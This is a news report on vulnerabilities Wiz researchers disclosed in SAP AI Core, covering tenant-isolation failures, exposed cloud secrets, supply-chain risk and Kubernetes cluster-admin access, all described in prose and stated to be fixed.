Security researchers have identified several vulnerabilities in SAP AI Core, a platform that enables users to develop, train and run AI services.
These vulnerabilities, found by Wiz and discussed in an advisory published on Wednesday, highlight significant risks associated with tenant isolation in AI infrastructure.
In particular, the investigation into SAP AI Core revealed that attackers could execute arbitrary code, allowing them to access sensitive customer data and cloud credentials. This breach could enable malicious actors to manipulate internal artifacts, impacting related services and other customer environments.
Wiz’s findings showed that it was possible to read and modify Docker images on SAP’s internal container registry and Google’s Container Registry, gain cluster administrator privileges on SAP AI Core’s Kubernetes cluster, and access customers’ cloud credentials and private AI artifacts.
Read more on AI in cybersecurity: OpenAI's ChatGPT is Breaking GDPR, Says Noyb
The research began with standard AI training procedures on SAP’s infrastructure, which allowed the execution of arbitrary code. This capability allowed the team to bypass network restrictions and exploit several configurations the admission controller did not block.
These exploits enabled access to sensitive tokens and configurations, leading to further vulnerabilities, such as unauthorized access to AWS secrets stored in Grafana Loki’s configuration, and exposing files on AWS Elastic File System instances.
Additionally, the team discovered an unauthenticated Helm server, which provided access to highly privileged secrets for SAP’s Docker Registry and Artifactory server. This access posed a risk of supply-chain attacks, where attackers could poison images and builds. The most critical vulnerability they uncovered was the ability to gain full cluster-admin privileges on the Kubernetes cluster, allowing access to other customers’ data and secrets.
All identified vulnerabilities were reported to SAP and have since been fixed. SAP confirmed that no customer data was compromised.
“This research demonstrates the unique challenges that the AI R&D process introduces,” Wiz said. “AI training requires running arbitrary code by definition; therefore, appropriate guardrails should be in place to assure that untrusted code is properly separated from internal assets and other tenants.”
Image credit: Wirestock Creators / Shutterstock.com